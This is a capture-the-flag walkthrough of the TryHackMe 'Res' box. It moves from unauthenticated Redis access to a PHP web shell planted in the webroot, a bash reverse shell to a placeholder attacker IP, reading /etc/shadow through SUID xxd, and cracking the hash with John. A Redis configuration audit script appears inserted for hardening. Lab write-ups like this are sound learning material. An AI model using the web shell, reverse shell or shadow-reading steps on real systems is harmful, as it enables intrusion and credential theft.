TryHackMe: Res Walkthrough

Yebberdog
6 min read · Oct 4, 2020


Res is a new box on TryHackMe where you have to hack into a vulnerable database server with an in-memory data-structure in this semi-guided challenge!

Let’s start off by scanning all ports using Nmap:

We can then run a version scan with default scripts to enumerate these ports further:

Looking at the results, we have an Apache web server running on port 80 and Redis 6.0.7, an in-memory data structure store, running on port 6379.

Port 80: Apache Web Server:

Let’s check out the web server on port 80:

OK, so we have the standard Apache landing page. Looking at the source code, we can see nothing hidden. I ran a directory scan using Dirsearch to see whether I could find any hidden directories. Unfortunately, no hidden directories were found. Time to move on to port 6379 and enumerate Redis.

Port 6379 Redis 6.0.7:

Redis is not something I am familiar with, so I spent some time Googling and found a good blog on enumerating Redis, as below:

To start with we need to download redis-tools, so we can have access to redis-cli:

sudo apt-get install redis-tools

To start redis-tools, from the command line we enter:

redis-cli -h [IP ADDRESS]

By default, Redis can be accessed without credentials. However, it can be configured to require a password only, or a username and password. In our case Redis can be accessed without any credentials. We can check this simply by entering the ‘info’ command, which an unauthenticated server answers in full.

From the above we can see that we have a potential username: vianka. From the HackTricks website we can see that we can gain RCE as follows:

To achieve RCE we need to know the web directory; to start with, we can assume the Apache default of /var/www/html.

Using the above as a PoC, we can try writing our RCE:

In Firefox we can navigate to [IP ADDRESS]/redis.php:

We can see that redis.php does indeed run phpinfo().

Let’s try this with another PHP script that runs the command passed in the cmd parameter (note the opening tag must be <?php with no space):

<?php system($_GET['cmd']); ?>

In redis-cli, we can simply overwrite the previous PHP file with this code and try RCE.
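The write-to-webroot trick above only works because an unauthenticated client can call CONFIG SET dir / dbfilename and SAVE. As an added example (not part of the original walkthrough or of Redis itself), here is a small Python audit of a redis.conf that flags exactly those preconditions, run over two constructed configs: one resembling what the box exposed and one hardened.

```python
"""Audit a redis.conf for the settings that made the RDB-to-webroot write possible.
Added example, not part of the original post: it flags the preconditions an
unauthenticated redis-cli session relied on (no password, network-reachable,
protected-mode off, CONFIG still callable)."""


def parse_redis_conf(text):
    """Map each directive to the list of its argument strings, in file order."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, _, args = line.partition(" ")
        conf.setdefault(key.lower(), []).append(args.strip())
    return conf


def audit_redis_conf(text):
    """Return a list of weaknesses found; an empty list means every check passed."""
    conf = parse_redis_conf(text)
    findings = []
    # Redis applies the last occurrence of a directive, so inspect the final value.
    if not conf.get("requirepass", [""])[-1].strip('"'):
        findings.append("no requirepass: any client that reaches the port gets full command access")
    for spec in conf.get("user", []):  # Redis 6 ACL lines, e.g. 'user default on nopass ~* +@all'
        tokens = spec.split()
        if tokens and tokens[0] == "default" and "nopass" in tokens:
            findings.append("ACL: default user is passwordless (nopass)")
    bind_tokens = [t for b in conf.get("bind", []) for t in b.split()]
    if not bind_tokens or any(t in ("0.0.0.0", "*", "::") for t in bind_tokens):
        findings.append("bind: Redis listens on all interfaces rather than localhost only")
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode is off")
    renamed = {r.split()[0].upper() for r in conf.get("rename-command", []) if r.split()}
    if "CONFIG" not in renamed:
        findings.append("CONFIG callable by name: dir/dbfilename changeable at runtime (rename-command CONFIG \"\" or deny it via ACL)")
    return findings


# Constructed sample configs: the first mirrors what the box exposed, the second is hardened.
WEAK_CONF = """bind 0.0.0.0
protected-mode no
dir /var/lib/redis"""
HARDENED_CONF = """bind 127.0.0.1 ::1
protected-mode yes
requirepass "change-me-to-a-long-random-secret"
rename-command CONFIG ""
dir /var/lib/redis"""
```

Calling audit_redis_conf(WEAK_CONF) returns four findings, while the hardened config returns none; renaming CONFIG is one mitigation, and on Redis 6 an ACL rule denying it for the default user is the other.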

Let’s see if we can print out the contents of the passwd file on the Linux machine. It is best to switch to ‘view-source’ to see the output with its line breaks intact:

And there we go, we have the full contents of the /etc/passwd file on the screen, and again we can see that we have a user vianka. All we need to do now is set up a listener and create a script to run a simple PHP reverse shell.

To do this I will do the same as above in redis-cli, but this time we will set the test key to the following PHP reverse shell script.

"<?php exec("/bin/bash -c 'bash -i > /dev/tcp/YOUR_IP/4444 0>&1'"); ?>"

One important point here is that the double quotes inside the PHP script clash with the quotes around the set test “….” argument, so they need to be escaped and our shell code modified as follows:

To capture the reverse shell I will start a Pwncat listener, as it has a great deal of functionality, a bit like Meterpreter: we can easily upload and download files for further enumeration of the system, as well as run the built-in privesc scripts.

And we are in as user www-data. In the /home directory we can see user vianka. Moving to vianka’s home directory, we can see that we have read access to user.flag, so we can read the flag.

Using Pwncat, we can switch to the local shell with Ctrl+D and run the built-in privesc script for simple enumeration by entering ‘privesc -l’ to list all the attack vectors.

The results show the binary xxd with the SUID bit set and owned by root. We can probably exploit this to read a file with full root privileges. The go-to reference for Linux binary exploits is GTFOBins.

Unfortunately we do not have sudo rights, but looking at the GTFOBins entry we can read a file as root, as the binary has the SUID bit set. It may be possible to read the shadow file, extract the hash for user vianka and see if we can brute-force it to get the password.

Using this technique we can print out the contents of the shadow file and copy vianka’s hash. If I can brute-force the hash using John, we can simply su to user vianka.

Brute Forcing Vianka’s Hash with John:

To do this we need to create two files, one with the passwd entry and one with the shadow entry; we only need to copy and paste the lines for user vianka. We can then use the ‘unshadow’ command to combine them into a format that John can read:

unshadow passwd.txt shadow.txt > hash.txt

Using John we can initially try to crack hash.txt with the standard John wordlist before moving on to other wordlists such as rockyou.txt:

john hash.txt

We now have the password for user vianka, so we can simply ‘su vianka’ to change user to vianka:

Running `sudo -l`, we can see that vianka can run all commands as any user, effectively the same rights as root. To escalate to root all we need to do is run ‘sudo su’ to change our user to root:

And there we have it, the root.txt file is there for the taking. I really enjoyed this box and it was good to learn about Redis, something I had not come across before. A big thank you to Stuxnet for creating this box and to TryHackMe for such an excellent platform for Noobs such as me to learn on.
